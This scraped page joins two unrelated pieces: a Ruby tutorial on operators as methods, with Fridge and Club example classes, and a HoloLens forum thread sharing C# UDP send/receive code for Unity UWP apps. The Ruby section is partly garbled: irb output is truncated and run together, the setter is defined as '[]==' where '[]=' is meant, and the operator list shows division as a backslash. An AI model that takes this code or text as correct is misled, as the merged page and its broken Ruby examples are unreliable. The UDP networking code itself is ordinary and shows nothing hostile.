Operators are things like the plus sign (one of the arithmetic operators), or the equal sign (the assignment operator). These things don’t look to much different from the ones you use in JavaScript, PHP, or any other language. But—like most of Ruby—there’s a lot more than meets the eye going on here.
Here’s the secret: operators in Ruby are really method calls. Try this:
1.+(2) # 3
Here, we’re calling the
+ operator on the object
1, passing in the object
2 as a parameter. We get back the object
3. We can do this with strings too:
name = "Joe" name.+(" Smith") # "Joe Smith", but `name` is still "Joe" name += " Smith" # name is now "Joe Smith"
As you can see, we can do string concatenation with the
+ method. As a bonus here, ruby defines the += operator based on the + operator (note: you can’t use += as a method).
As you might realize, this gives us incredible power. We can customize the meaning of adding, subtracting, and assigning objects in our custom classes. We saw how this works with properties on objects in our lesson on classes (we defined a
property and
property= method in the class, and got the expected syntax sugar for using them). What we’re looking at here is taking that a step further.
Building our own Operator Methods
Let’s try to create one of these methods ourselves. For this example, let’s create a refrigerator object, that we can add things to via the
+ operator and take things out of via the
- operator.
Here’s the start of our class:
class Fridge def initialize (beverages=[], foods=[]) @beverages = beverages @foods = foods end def + (item) end def - (item) end end
Our
initialize function is pretty simple: we take two parameters (that fall back to empty arrays if nothing is given), and assign them to instance variables. Now, let’s build those two functions:
def + (item) if item.is_a? Beverage @beverages.push item else @foods.push item end end
This is pretty simple. Every object has an
is_a? method that takes a single parameter: a class. If the object is an instance of that class, it will return true; otherwise, it will return false. So, this says that if the item we’re adding to the fridge is a
Beverage, we’ll add it to the
@beverages array. Otherwise, we’ll add it to the
@food array.
That’s good; now, how about taking things out of the fridge? (Note: this method is different from the one shown in the video; this shows you that these operator method give us a great deal of flexibility; they are really just normal methods that you can do anything with. Also, I think this is a better version of the method; however, it’s more complex.)
def - (item) ret = @beverages.find do |beverage| beverage.name.downcase == item.downcase end return @beverages.delete ret unless ret.nil? ret = @foods.find do |food| food.name.downcase == item.downcase end @foods.delete ret end
Here’s what’s going on when we use the minus operator. The parameter that it takes is a string, with the name of the item we’re looking for (By the way, we’ll create the
Beverage and
Food classes soon). We start by using the
find method that arrays have. There are a few ways to use this method; we’re passing it a block; this block says that we’re trying to find the item in the array which has a
name property that’s the same as the string we passed in; note that we’re converting both strings to lowercase, to be safe.
If there’s an item that matches in the array, that will be stored in
ret; otherwise,
ret will be
nil. Next, we’ll return the result of
@beverage.delete ret, which removes the item from the array and returns it. Notice we’re using a statement modifier at the end of that line: we do this unless
ret is
nil.
You might wonder why we’re using the keyword
return here, since it’s not required in Ruby. If we didn’t use it here, the function wouldn’t return yet, since there’s more code to the function. Using
return here allows us to return a value from a place the function wouldn’t normally return.
If we don’t return, that means the item wasn’t found in
@beverages. Therefore, we’ll assume it’s in
@foods. We’ll do the same thing to find the item in
@foods and then return it.
Before testing this out, we’ll need our
Food and
Beverages classes:
class Beverage attr_accessor :name def initialize name @name = name @time = Time.now end end class Food attr_accessor :name def initialize name @name = name @time = Time.now end end
Note that in the video, I didn’t make
@name accessible from outside the object. Here, I’m doing that with
attr_accessor :name, so that we can check the name of these object when they’re inside a fridge.
So, let’s test it out in irb; we’ll start by requiring the file that holds the code; then, give the classes a try; note that I’ve added line breaks to the output for easier reading.
> require './lesson_6' => true > f = Fridge.new => #<Fridge:0x00000100a10378 @beverages=[], @foods=[]> > f + Beverage.new("water") => [#<Beverage:0x000001009fe8d0 @name="water", @time=2011-01-15 13:20:48 -0500>] > f + Food.new("bread") => [#<Food:0x000001009d3c98 @name="bread", @time=2011-01-15 13:20:59 -0500>] > f + Food.new("eggs") => [ #<Food:0x000001009d3c98 @name="bread", @time=2011-01-15 13:20:59 -0500>, #<Food:0x000001009746a8 @name="eggs", @time=2011-01-15 13:21:04 -0500> ] > f + Beverage.new("orange juice") => [ #<Beverage:0x000001009fe8d0 @name="water", @time=2011-01-15 13:20:48 -0500>, #<Beverage:0x00000100907cd8 @name="orange juice", @time=2011-01-15 13:21:16 01009d3c98 @name="bread", @time=2011-01-15 13:20:59 -0500>, #<Food:0x000001009746a8 @name="eggs", @time=2011-01-15 13:21:04 -0500> ] > f - "bread" => #<Food:0x000001009d3c98 @name="bread", @time=2011-01-15 13:20:59 01009746a8 @name="eggs", @time=2011-01-15 13:21:04 -0500>]
As we go along, you can see things being added to the
@beverages and
@foods arrays, and then subsequently removed.
Get and Set Operators
Now let’s write methods for the get and set operators used with hashes. You’ve seen this before:
person = {} person[:name] = "Joe"
But, since these operators are methods, we can do it this way:
person.[]=(:age, 35) # to set person.[](:name) # to get
That’s right; these are normal methods, with special sugar for your use.
Let’s give this a try; we’ll make a
Club class. Our club with have members with different roles. However, we may want to have more than one member with a given role. So, our
Club instance will keep track of members and their roles with a hash. If we try to assign a second member to a role, instead of overwriting the first one, we’ll add it.
class Club def initialize @members = {} end def [] (role) @members[role] end def []= (role, member) end end
The get version is pretty simple; we just forward it to the
@members array. But set is a little more complicated:
def []== (role, member) if @members[role].nil? @members[role] = member elsif @members[role].is_a? String @members[role] = [ @members[role], member ] else @members[role].push member end end
If that role has not been set, we’ll just set the value of that key to our member hash. If it has been set as a string, we want to convert that to an array, and put the original member and the new member in that array. Finally, if neither of those options are true, it’s already an array, and so we just push the member into the array. We can test this class this way:
c = Club.new c[:chair] = "Joe" c[:engineer] = "John" c[:engineer] = "Sue" c[:chair] # "Joe" c[:engingeer] # [ "John", "Sue" ]
There you go!
Other Operators
These aren’t the only operators that we can do this with, of course. Here’s the whole list:
- Arithmetic Operators:
+ - * \
- Get and Set Operators:
[] []=
- Shovel Operator:
<<
- Comparison Operators:
== < > <= >=
- Case equality Operator:
===
- Bit-wise Operator:
| & ^
Thanks for Reading!
If you’ve got any questions about this lesson, or anything else we’ve discussed in Ruby, ask away in the comments!
Tuts+ tutorials are translated into other languages by our community members—you can be involved too!Translate this post
| http://code.tutsplus.com/tutorials/ruby-for-newbies-operators-and-their-methods--net-18163 | CC-MAIN-2015-22 | refinedweb | 1,528 | 72.66 |
I absolutely love the concept of reactive computed properties in Vue.js. So much so that I miss them in situations where I don’t have them available. In this article, we will explore how to create reactive data models with all the features of regular Vue.js components such as computed properties. Our goal is to fetch data from an API and store it in a reactive data model.
Reactive data models
Most of the time we tend to fetch data directly in our components and use computed properties in case we need to process the received data.
// BlogPost.vue // ... export default { name: 'BlogPost', // ... computed: { authorFullName() { return `${this.post.author.firstName} ${this.post.author.lastName}`; }, intro() { if (!this.post) return null; const wordCount = 20; return `${this.post.body .split(' ') .slice(0, wordCount) .join(' ')}...`; } }, async created() { this.post = await fetch('/posts/1'); }, // ... };
But now let’s assume we have two or more components in which we want to render the full name of the author of a blog post and a short version of the blog post itself. This means that we have to repeat the same computed properties over and over again.
Wouldn’t it be nice to actually have the computed properties directly in a data model? Ideally, we would have to write the logic only once in the data model and the consuming components would access it like any other regular property - ideally, the data model should work like a Vue.js component.
One possible way to achieve the desired effect is to use Vuex. And there’s no reason why you shouldn’t use Vuex in such a case, actually I’d say it’s perfect for solving such problems. But sometimes it seems a bit over the top to use a global state management solution just to solve a tiny problem.
Creating a Vue.js powered data model
A lesser-known feature of Vue.js is the ability to create a new instance of
Vue without the intention of rendering anything.
import Vue from 'vue'; const author = new Vue({ data() { return { firstName: 'Joana', lastName: 'Doe', }; }, computed: { fullName() { return `${this.firstName} ${this.lastName}`; }, }, }); console.log(author.fullName); // Joana Doe author.firstName = 'John'; console.log(author.fullName); // John Doe
Actually, the above code already looks exactly how I imagine a reactive data model should work - and that’s not surprising, because that’s exactly what Vue.js is all about. Now let’s combine this with a simplified prototype of a Query Builder.
Creating a JavaScript Query Builder
When I first thought of this pattern, I had Laravel Eloquent models in mind. A very powerful feature of the Laravel Eloquent models is that each model serves as a Query Builder. For this article I want to implement a very simple version of a Query Builder, which can be improved as needed.
// src/utils/model.js import Vue from 'vue'; // Helper for creating a new Vue.js // powered data model instance. const vueify = ({ data, model }) => { const instance = new Vue(model); Object.keys(data).forEach(key => { // The hash `#` prefix means that // this properties should not be // modified directly. if (typeof instance[`#${key}`] === 'undefined') return; instance[`#${key}`] = data[key]; }); return instance; }; function QueryBuilder({ model, provider }) { this.query = []; this.model = model; this.provider = provider; } QueryBuilder.prototype.where = function(queryParams) { this.query.push(queryParams); return this; }; QueryBuilder.prototype.first = async function() { const data = await this.provider.find(this.query); return vueify({ data, model: this.model }); }; QueryBuilder.prototype.all = async function() { const response = await this.provider.list(); return response.map(data => vueify({ data, model: this.model })); }; QueryBuilder.prototype.get = async function() { const response = await this.provider.list(this.query); return response.map(data => vueify({ data, model: this.model })); }; // ...
Above you can see a very simple implementation of a Query Builder. In a real world application, you would most likely add more features like logical operators, but for demo purposes that’s good enough.
// src/utils/model.js // ... export const makeModel = ({ computed, fields, provider }) => { const model = { data: () => // Create prefilled data properties // for each field of the model. Object.keys(fields).reduce( (prev, key) => ({ ...prev, [`#${key}`]: fields[key].default, }), {}, ), // The values of the fields of the model // should not be changed directly, so we // expose them as immutable computed // properties. computed: { ...Object.keys(fields).reduce( (prev, key) => ({ ...prev, [key]() { return this[`#${key}`]; }, }), {}, ), ...computed } }; return new QueryBuilder({ model, provider }); };
The
makeModel() function above, takes an object of computed properties, the fields of the model and a provider for the Query Builder and returns a new Query Builder object.
import { makeModel } from '../utils/model'; import fakeProvider from './providers/fake'; export const makePost = ({ ellipsis = '...', words = 10 }) => makeModel({ fields: { author: { default: {} }, body: { default: null }, title: { default: null }, }, computed: { authorFullName() { if (!this.author.firstName) return null; return `${this.author.firstName} ${this.author.lastName}`; }, intro() { if (!this.body) return null; return `${this.body .split(' ') .slice(0, words) .join(' ')}${ellipsis}`; } }, provider: fakeProvider });
Here you can see how we can utilize
makeModel() in our new
makePost() function.
makePost() takes some configuration options and returns a new
post model which we can use to query our (fake) API exposed via the
fakeProvider. In a production application you would have an
apiProvider or a
vuexProvider or maybe even a
localStorageProvider which are abstraction layers to fetch data from an API, a Vuex store or the local storage of your browser.
Do you want to learn more about advanced Vue.js techniques?
Register for the Newsletter of my upcoming book: Advanced Vue.js Application Architecture.
Put it together
Next you can see how we can use the
post model returned by
makePost() in a regular Vue.js component.
<template> <div v- <h1>{{ post.title }}</h1> <span>Author: {{ post.authorFullName }}</span> <p> <template v- {{ post.body }} </template> <template v-else> {{ post.intro }} <button @ read more </button> </template> </p> </div> </template> <script> import { makePost } from '../models/post'; export default { name: 'BlogPost', data() { return { post: null, showBody: false, }; }, async created() { // Create a new post model and fetch // the first post where the `id` is `1`. this.post = await makePost({ words: 20 }) .where({ id: 1 }) .first(); }, }; </script>
This example is a simplified version for demonstration purposes. In a real application the
BlogPost component would take the
post as a required property so it doesn’t care if it is a static object or a reactive data model.
Wrapping it up
In the future, the reuse of computed properties can be easily achieved by using the Vue.js Composition API. But even then, I think it’s very valuable to add a layer of abstraction and not directly fetch data within your Vue.js components.
I think using data models can be a very elegant solution not only for reusing code, but also for decoupling your data fetching and rendering logic. If you use some form of dependency injection to make your models available to your components, you could even inject different implementations into different components (think of different computed properties for example). | https://markus.oberlehner.net/blog/vue-powered-data-model-and-query-builder/ | CC-MAIN-2019-47 | refinedweb | 1,152 | 59.3 |
New in the 2012 Advantage Pack: PPG logic for ICE compounds.
In the compound properties, there’s a PPG Logic button that opens up a script editor where you can define some PPG callbacks:
- OnInit is called when a user opens the PPG.
You can use this callback for initialization code, but you cannot define the PPG layout (eg add tabs, groups, or buttons). ICE has its own layout code and ignores any PPGLayout you might define.
- _OnChanged is called when a user changes a value in the PPG.
from siutils import log # LogMessage def OnInit( ): log("Modulate_by_Fcurve_OnInit called") oPPG = PPG oLayout = oPPG.PPGLayout # # Clamp exposed port # def Clamp_OnChanged(): log( PPG.Clamp.Value ) # # Input Range Start exposed port # def Input_Range_Start_OnChanged(): log( "Input Range = ( %.2f, %.2f )" % (PPG.Input_Range_Start.Value, PPG.Input_Range_End.Value ) ) # # Input Range End exposed port # def Input_Range_End_OnChanged(): log( "Input Range = ( %.2f, %.2f )" % (PPG.Input_Range_Start.Value, PPG.Input_Range_End.Value ) )
The “PPG logic” is saved in the element of the .xiscompound file. | http://xsisupport.com/2011/09/27/ | CC-MAIN-2015-27 | refinedweb | 161 | 64.91 |
Dynaconf
dynaconf - The dynamic configurator for your Python Project
dynaconf is an OSM (Object Settings Mapper) it can read settings variables from a set of different data stores such as python settings files, environment variables, redis, memcached, ini files, json files, yaml files and you can customize dynaconf loaders to read from wherever you want. (maybe you really want to read from xml files ughh?)
GITHUB REPO:
What is Dynaconf?
Dynaconf is a common point of access to settings variables, you import only one object in your project and from that object you can access settings variables from Python settings file, from environment variables, from parsed yaml, ini, json or xml files, from datastores as Redis and MongoDB or from wherever your need if you write a simple dynaconf loader.
How it works
Install it
pip install dynaconf
Use it
from dynaconf import settings print settings.SOME_VARIABLE or print settings.get('SOME_VARIABLE')
By default Dynaconf will try to use a file called
settings.py on the root of your project, if you place that file there all upper case variables will be read
You can also replace the file exporting an environment variable pointing to the module or location for the settings file.
# using module name export DYNACONF_SETTINGS=myproject.production_settings # or using location path export DYNACONF_SETTINGS=/etc/myprogram/settings.py
Doing that when you use
from dynaconf import settings the variables will be read from that file.
So how it is Dynamic?
Now think you have your program done and you want to deploy to a certain infrastructure for testing or maybe different deployment, you don't need to rewrite the settings file. Just export some variables to your environment.
export DYNACONF_MYSQL_HOST=myserver.com
Now in your project you can do:
from dynaconf import settings print settings.MYSQL_HOST myserver.com
The default prefix for exported envvars is by default DYNACONF_ but you also can change it if needed.
But what if I have some typed values to export?
You can also define type casting when exporting and those types will be used to parse the values.
export DYNACONF_NUMBER='@int 123' export DYNACONF_FLOAT='@float 12.2' export DYNACONF_FLAG='@bool yes' export DYNACONF_FLAG2='@bool disabled' export DYNACONF_LIST='@json [1, 2, 3, 4]' export DYNACONF_DICT='@json {"name": "Bruno"}'
Now you can read all those values from your project and it will be loaded with correct type casting.
from dynaconf import settings type(settings.NUMBER) int type(settings.FLOAT) float type(settings.FLAG) bool print settings.FLAG2 == False True print settings.LIST[1] 2 print settings.DICT['name'] Bruno
Nice! But I don't want to use envvars because I use autoscaling and I want my machines to share a settings environment how to do it?
Redis
Go to your settings file (default settings.py) and put
# connection REDIS_FOR_DYNACONF = { 'host': 'localhost', 'port': 6379, 'db': 0 } # and loader LOADERS_FOR_DYNACONF = [ 'dynaconf.loaders.env_loader', 'dynaconf.loaders.redis_loader' ]
Now you can store settings variables directly in Redis using a hash named by default DYNACONF_DYNACONF
If you don't want want to write directly you can use the Redis writer helper in a python REPL. (ipython as example)
from dynaconf.utils import redis_writer from dynaconf import settings redis_writer.write(settings, name='Bruno', mysql_host='localhost', MYSQL_PORT=1234)
And the above will be store in Redis as a hash int the form.
DYNACONF_DYNACONF: NAME='Bruno' MYSQL_HOST='localhost' PORT='@int 1234'
And of course you can now read those variables in the project, all the casting wildcards also works on Redis but if you want to skip type casting, write as string intead of PORT=1234 use PORT='1234' as redis stores everything as string anyway.
There is more
Dynaconf has support for using different namespaces in the same project, you can also write your own loaders, you can find more information on the repository
Contribute
All contributions are very welcome!!
Acknowledgements
Dynaconf was inspired by Flask app config and also by Django settings module. | http://brunorocha.org/python/dynaconf-let-your-settings-to-be-dynamic.html | CC-MAIN-2017-51 | refinedweb | 653 | 54.93 |
Welcome to the Java Scheduler Example. Today we will look into
ScheduledExecutorService and it’s implementation class
ScheduledThreadPoolExecutor example.
Table of Contents
Java Scheduler ScheduledExecutorService
Sometimes we need to execute a task periodically or after specific delay. Java provides Timer Class through which we can achieve this but sometimes we need to run similar tasks in parallel. So creating multiple Timer objects will be an overhead to the system and it’s better to have a thread pool of scheduled tasks.
Java provides scheduled thread pool implementation through
ScheduledThreadPoolExecutor class that implements
ScheduledExecutorService interface. ScheduledExecutorService defines the contract methods to schedule a task with different options.
Sometime back I wrote a post about Java ThreadPoolExecutor where I was using Executors class to create the thread pool. Executors class also provide factory methods to create ScheduledThreadPoolExecutor where we can specify the number of threads in the pool.
Java Scheduler Example
Let’s say we have a simple Runnable class like below.
WorkerThread.java
package com.journaldev.threads; import java.util.Date; public class WorkerThread implements Runnable{ private String command; public WorkerThread(String s){ this.command=s; } @Override public void run() { System.out.println(Thread.currentThread().getName()+" Start. Time = "+new Date()); processCommand(); System.out.println(Thread.currentThread().getName()+" End. Time = "+new Date()); } private void processCommand() { try { Thread.sleep(5000); } catch (InterruptedException e) { e.printStackTrace(); } } @Override public String toString(){ return this.command; } }
It’s a simple Runnable class that takes around 5 seconds to execute its task.
Let’s see a simple example where we will schedule the worker thread to execute after 10 seconds delay. We will use Executors class
newScheduledThreadPool(int corePoolSize) method that returns instance of
ScheduledThreadPoolExecutor. Here is the code snippet from Executors class.
public static ScheduledExecutorService newScheduledThreadPool(int corePoolSize) { return new ScheduledThreadPoolExecutor(corePoolSize); }
Below is our java scheduler example program using
ScheduledExecutorService and
ScheduledThreadPoolExecutor implementation.
package com.journaldev.threads; import java.util.Date; import java.util.concurrent.Executors; import java.util.concurrent.ScheduledExecutorService; import java.util.concurrent.TimeUnit; public class ScheduledThreadPool { public static void main(String[] args) throws InterruptedException { ScheduledExecutorService scheduledThreadPool = Executors.newScheduledThreadPool(5); //schedule to run after sometime System.out.println("Current Time = "+new Date()); for(int i=0; i<3; i++){ Thread.sleep(1000); WorkerThread worker = new WorkerThread("do heavy processing"); scheduledThreadPool.schedule(worker, 10, TimeUnit.SECONDS); } //add some delay to let some threads spawn by scheduler Thread.sleep(30000); scheduledThreadPool.shutdown(); while(!scheduledThreadPool.isTerminated()){ //wait for all tasks to finish } System.out.println("Finished all threads"); } }
When we run above java scheduler example program, we get following output that confirms that tasks are running with 10 seconds delay.
Current Time = Tue Oct 29 15:10:03 IST 2013 pool-1-thread-1 Start. Time = Tue Oct 29 15:10:14 IST 2013 pool-1-thread-2 Start. Time = Tue Oct 29 15:10:15 IST 2013 pool-1-thread-3 Start. Time = Tue Oct 29 15:10:16 IST 2013 pool-1-thread-1 End. Time = Tue Oct 29 15:10:19 IST 2013 pool-1-thread-2 End. Time = Tue Oct 29 15:10:20 IST 2013 pool-1-thread-3 End. Time = Tue Oct 29 15:10:21 IST 2013 Finished all threads
Note that all the
schedule() methods return instance of
ScheduledFuture that we can use to get the thread state information and delay time for the thread.
ScheduledFuture extends Future interface, read more about them at Java Callable Future Example.
There are two more methods in ScheduledExecutorService that provide option to schedule a task to run periodically.
ScheduledExecutorService scheduleAtFixedRate(Runnable command,long initialDelay,long period,TimeUnit unit)
We can use ScheduledExecutorService scheduleAtFixedRate method to schedule a task to run after initial delay and then with the given period.
The time period is from the start of the first thread in the pool, so if you are specifying period as 1 second and your thread runs for 5 second, then the next thread will start executing as soon as the first worker thread finishes it’s execution.
For example, if we have code like this:
for (int i = 0; i < 3; i++) { Thread.sleep(1000); WorkerThread worker = new WorkerThread("do heavy processing"); // schedule task to execute at fixed rate scheduledThreadPool.scheduleAtFixedRate(worker, 0, 10, TimeUnit.SECONDS); }
Then we will get output like below.
Current Time = Tue Oct 29 16:10:00 IST 2013 pool-1-thread-1 Start. Time = Tue Oct 29 16:10:01 IST 2013 pool-1-thread-2 Start. Time = Tue Oct 29 16:10:02 IST 2013 pool-1-thread-3 Start. Time = Tue Oct 29 16:10:03 IST 2013 pool-1-thread-1 End. Time = Tue Oct 29 16:10:06 IST 2013 pool-1-thread-2 End. Time = Tue Oct 29 16:10:07 IST 2013 pool-1-thread-3 End. Time = Tue Oct 29 16:10:08 IST 2013 pool-1-thread-1 Start. Time = Tue Oct 29 16:10:11 IST 2013 pool-1-thread-4 Start. Time = Tue Oct 29 16:10:12 IST 2013
ScheduledExecutorService scheduleWithFixedDelay(Runnable command,long initialDelay,long delay,TimeUnit unit)
ScheduledExecutorService scheduleWithFixedDelay method can be used to start the periodic execution with initial delay and then execute with given delay. The delay time is from the time thread finishes it’s execution. So if we have code like below:
for (int i = 0; i < 3; i++) { Thread.sleep(1000); WorkerThread worker = new WorkerThread("do heavy processing"); scheduledThreadPool.scheduleWithFixedDelay(worker, 0, 1, TimeUnit.SECONDS); }
Then we will get output like below.
Current Time = Tue Oct 29 16:14:13 IST 2013 pool-1-thread-1 Start. Time = Tue Oct 29 16:14:14 IST 2013 pool-1-thread-2 Start. Time = Tue Oct 29 16:14:15 IST 2013 pool-1-thread-3 Start. Time = Tue Oct 29 16:14:16 IST 2013 pool-1-thread-1 End. Time = Tue Oct 29 16:14:19 IST 2013 pool-1-thread-2 End. Time = Tue Oct 29 16:14:20 IST 2013 pool-1-thread-1 Start. Time = Tue Oct 29 16:14:20 IST 2013 pool-1-thread-3 End. Time = Tue Oct 29 16:14:21 IST 2013 pool-1-thread-4 Start. Time = Tue Oct 29 16:14:21 IST 2013
That’s all for java scheduler example. We learned about ScheduledExecutorService and ScheduledThreadPoolExecutorthread too. You should check other articles about Multithreading in Java.
References:
My desktop application hangs after 2hours, is there any bug in the following code.
Pl.guide me
ScheduledExecutorService executor = Executors.newScheduledThreadPool(1);
final Runnable beeper = new Runnable() {
public void run() {
//new kotprint();
//new DinaUtil().updatetablestatus();
System.out.println(“beep” + util.gettimewithss());
}
};
executor.scheduleAtFixedRate(beeper, 10, 10, TimeUnit.SECONDS);
Can schedule() method can trigger a task a little early from the scheduled time.
In my problem. a task should be triggered at 11:00 am in the morning, but it is being triggered at 10:59:48 am. In fact, the early triggering time varies between 1 sec to 12 sec.
I am have the same issue.
My tasks are supposed to start at midnight. First time it was OK but the second time it started the task 2 seconds early, 23:59:58.
How to schedule cron jobs using cron expressions in Java? I don’t want to use quartz or other third party libraries.
How should i kill the threads after finishing its task? I am working with quartz schedular
Very nice article.
Is there any way to verify whether the invoked thread is finished or not? If the invoked thread is taking more than the expected time.. I want to kill the thread and continue.
Congratulations on your article. I found it very useful. I just have a question: how can I schedule multiple different tasks in different hours of day such as:
task 1: 7 am : “have breakfast”;
task 2: 8 am : “go to work”;
task 3: 1 pm: “have lunch”;
task 4: 6 pm: “go home”
task 5: 7 pm: “have dinner”
task 6: 9 om: “go to sleep”
What is the best solution to come up with an app that prints out these messages at these particular time of the day?
Thank you in advance,
Kind regards,
Fábio. | https://www.journaldev.com/2340/java-scheduler-scheduledexecutorservice-scheduledthreadpoolexecutor-example | CC-MAIN-2021-04 | refinedweb | 1,362 | 59.5 |
.
UDP-Communication [SOLVED]
After a little bit searching I found a solution for UDP-Communication (sending & receiving).
I found a very simple solution at
and modified it a "little bit" for more flexibility ..
Some remarks:
- the code works ONLY in an UWP-App (Unity) - on Hololens and PC - not in Unity-Editor !
- for testing the communication I used
UDPCommunication.cs
using UnityEngine; using System; using System.IO; using System.Text; using System.Linq; using HoloToolkit.Unity; using System.Collections.Generic; using UnityEngine.Events; #if !UNITY_EDITOR using Windows.Networking.Sockets; using Windows.Networking.Connectivity; using Windows.Networking; #endif [System.Serializable] public class UDPMessageEvent : UnityEvent<string, string, byte[]> { } public class UDPCommunication : Singleton<UDPCommunication> { [Tooltip ("port to listen for incoming data")] public string internalPort = "12345"; [Tooltip("IP-Address for sending")] public string externalIP = "192.168.17.110"; [Tooltip("Port for sending")] public string externalPort = "12346"; [Tooltip("Send a message at Startup")] public bool sendPingAtStart = true; [Tooltip("Conten of Ping")] public string PingMessage = "hello"; [Tooltip("Function to invoke at incoming packet")] public UDPMessageEvent udpEvent = null; private readonly Queue<Action> ExecuteOnMainThread = new Queue<Action>(); #if !UNITY_EDITOR //we've got a message (data[]) from (host) in case of not assigned an event void UDPMessageReceived(string host, string port, byte[] data) { Debug.Log("GOT MESSAGE FROM: " + host + " on port " + port + " " + data.Length.ToString() + " bytes "); } //Send an UDP-Packet public async void SendUDPMessage(string HostIP, string HostPort, byte[] data) { await _SendUDPMessage(HostIP, HostPort, data); } DatagramSocket socket; async void Start() { if (udpEvent == null) { udpEvent = new UDPMessageEvent(); udpEvent.AddListener(UDPMessageReceived); } Debug.Log("Waiting for a connection..."); socket = new DatagramSocket(); socket.MessageReceived += Socket_MessageReceived; HostName IP = null; try { var icp = NetworkInformation.GetInternetConnectionProfile(); IP = Windows.Networking.Connectivity.NetworkInformation.GetHostNames() .SingleOrDefault( hn => hn.IPInformation?.NetworkAdapter != null && hn.IPInformation.NetworkAdapter.NetworkAdapterId == icp.NetworkAdapter.NetworkAdapterId); await socket.BindEndpointAsync(IP, internalPort); } catch (Exception e) { Debug.Log(e.ToString()); Debug.Log(SocketError.GetStatus(e.HResult).ToString()); return; } if(sendPingAtStart) SendUDPMessage(externalIP, externalPort, Encoding.UTF8.GetBytes(PingMessage)); } private async System.Threading.Tasks.Task _SendUDPMessage(string externalIP, string externalPort, byte[] data) { using (var stream = await socket.GetOutputStreamAsync(new Windows.Networking.HostName(externalIP), externalPort)) { using (var writer = new Windows.Storage.Streams.DataWriter(stream)) { writer.WriteBytes(data); await writer.StoreAsync(); } } } #else // to make Unity-Editor happy :-) void Start() { } public void SendUDPMessage(string HostIP, string HostPort, byte[] data) { } #endif static MemoryStream ToMemoryStream(Stream input) { try { // Read and write in byte[] block = new byte[0x1000]; // blocks of 4K. MemoryStream ms = new MemoryStream(); while (true) { int bytesRead = input.Read(block, 0, block.Length); if (bytesRead == 0) return ms; ms.Write(block, 0, bytesRead); } } finally { } } // Update is called once per frame void Update() { while (ExecuteOnMainThread.Count > 0) { ExecuteOnMainThread.Dequeue().Invoke(); } } #if !UNITY_EDITOR private void Socket_MessageReceived(Windows.Networking.Sockets.DatagramSocket sender, Windows.Networking.Sockets.DatagramSocketMessageReceivedEventArgs args) { Debug.Log("GOT MESSAGE FROM: " + args.RemoteAddress.DisplayName); //Read the message that was received from the UDP client. Stream streamIn = args.GetDataStream().AsStreamForRead(); MemoryStream ms = ToMemoryStream(streamIn); byte[] msgData = ms.ToArray(); if (ExecuteOnMainThread.Count == 0) { ExecuteOnMainThread.Enqueue(() => { Debug.Log("ENQEUED "); if (udpEvent != null) udpEvent.Invoke(args.RemoteAddress.DisplayName, internalPort, msgData); }); } } #endif }
Assign this Script to an (empty) GameObject, set the Properties and assign a UnityEvent to UdpEvent ... like this:
using System.Collections; using System.Collections.Generic; using UnityEngine; public class UDPResponse : MonoBehaviour { public TextMesh tm = null; public void ResponseToUDPPacket(string incomingIP, string incomingPort, byte[] data) { if (tm != null) tm.text = System.Text.Encoding.UTF8.GetString(data); #if !UNITY_EDITOR //ECHO UDPCommunication comm = UDPCommunication.Instance; comm.SendUDPMessage(incomingIP, comm.externalPort, data); #endif } }
Any comments and/or modifications are welcome !
Tagged:
3
Hi! I was wondering what latency you get with this implementation? Thanks!
Hey DrNeurosurg! Great work.
I have prior exposure to serial comms, but not over IP.
Just for clarification, UDPCommunication.cs gets assigned to an empty game object to be run in a UWP app from the computer, and UDPResponse.cs gets assigned to an empty game object to be run in a UWP on the Hololens (just to echo back)?
Please correct me if I'm wrong.
@JKukulsky:
No - On Hololens-UWP-App Assign the UDPCommunication.cs to an empty Gameobject and also UDPResponse.cs to the same or diffrent Gameobject ...
It's both for receiving.
If you want send from an Unity-UWP-Desktop-PC-App you need only to assign UDPCommunication.cs to an Gameobject...
I'll post a Github-link to both examples in a short time ..
@DrNeurosurg
How would you use this to control a game object using the message received from a udp server?
This does not work properly.
Weirdly, Hololens will only be able to receive UDP messages from externalIP after it does SendUDPMessage(externalIP, externalPort,Encoding.UTF8.GetBytes(PingMessage));
Somehow it does not listen like a UDPServer. It needs to send to a Server (externalIP) 1st then wait to receive messages.
I tried out the scripts here on Hololens and does not work too for a typical UDP Server
Anyone has insights?
THanks !
@DrNeurosurg have you post your example to the GitHub-link? Thank you.
Can we get some official word from Microsoft on this? It is so weird that the Hololens doesn't listen to UDP packets. This should not have to do with implementation on the application layer. It should listen to UDP period. What is going on?
Got to be patient .... or wait for Hololens 2 ?
nice
Doesn't work for me. Microsoft this is on you. I have client projects currently stalled because of this thing. How can a 2016 device NOT work with UDP? I'm not sure if I should cry or laugh at this.
I have done complete testing and it works fine in standalone UWP-app, it works fine in other settings like mobile, just not the Hololens.
So much for UWP.
Yeah that doesn't fly with clients though. And the rest of the internet. UDP is not something new.
Hi everyone, this code works very well. Sincere thanks to Dr Neurosurg
. I was able to use it to receive information from a udp server (that I programmed in ubuntu) to overlay body pose estimation on people in near real-time, check out the video here (> 1 min 22 s):
Hi summerIntern: by 'this code' do you mean the code pasted in this thread above? Or some other code you worked on? Any tips?
Yes @DrNeurosurg did see DrNeuroSurg -GitHub repositories
I have this code working on a PC. I use the sharing service to communicate with the HoloLenses and this code to communicate with other stuff. Thanks for sharing this code.
I'm unsure of whether this might help this thread but as part of the set of experimental blog posts that I wrote which started here;
I wrote a small UDP multicasting library to send/receive small messages between HoloLens devices.
I also wrote a console-based test application and a 2D UWP XAML based test application for that library.
That library and those apps seem to work ok for me when running from HoloLens<->PC although I will flag that sometimes I find that the HoloLens doesn't seem to pick up messages from the PC and I find that I have to reboot the device to clear that problem although I'm not 100% sure that it isn't my code not doing the right things with respect to timeouts on sockets.
Regardless...I thought I'd add this info to this thread in case any of that helps with some of the UDP explorations that people are making.
As an aside, the blog posts go on to build on top of this library but the first post only points to the library itself so that might be relevant here around UDP.
because I failed to use this program, is there anybody know how to set "externalIP"? it is the ip of my computer?
@DrNeurosurg @JeffGullicksen I got a version of this solution working one-way (hololens -> pc) but I can't seem to send anything from pc -> hololens, it's driving me nuts. would anyone be kind enough to share a working example of this code?
Hi, thanks for sharing.
I'm able to receive a webcam stream to my hololens, but I've a problem of memory leak. Did you have it too?
If nothing pass over the UDP, the memory is stable, when I turn on the UDP sender (a smartphone), the memory increase and I have only the UDPCommunication in my scene.
Where could I add something to free the memory?
Thanks
UPDATE: I saw that the line that increase the memory process od the Hololens when I receive data is this one:
Stream streamIn = args.GetDataStream().AsStreamForRead();
Why should it increase constantly? I'm using GC.Collect() every 10 sec, but nothing happens to the memory unfortunatelly.
Please help.
